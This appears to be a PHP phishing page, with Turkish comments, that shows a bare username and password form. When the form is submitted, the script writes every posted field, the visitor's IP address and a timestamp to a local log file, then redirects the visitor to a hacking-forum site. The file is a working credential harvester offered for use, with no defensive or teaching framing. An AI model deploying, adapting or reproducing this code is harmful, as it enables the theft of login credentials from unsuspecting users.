<?php
if ($_SERVER['REQUEST_METHOD'] == 'POST') { //Methot
header('********: https://www.turkhackteam.org/'); //Yönlendirilecek link
$handle = fopen('log_BUMhGB0W2I.txt', 'a'); //Verilerin kayıt olacağı dosya
fwrite($handle, '----------------------------------------------------------------------['.$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME'].']---['.strtoupper(date("h:i:s a - Y/m/d")).']---['.$_SERVER['REMOTE_ADDR']."]\r\n");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable.': '.$value."\r\n");}
fclose($handle);
exit;
} ?>
<form action="<?php echo basename(__FILE__); ?>" method="post">
<input type='text' name='KullaniciAdi' value='' />
<input type='password' name='Şifre' value='' />
<button>asdasd</button>
</form>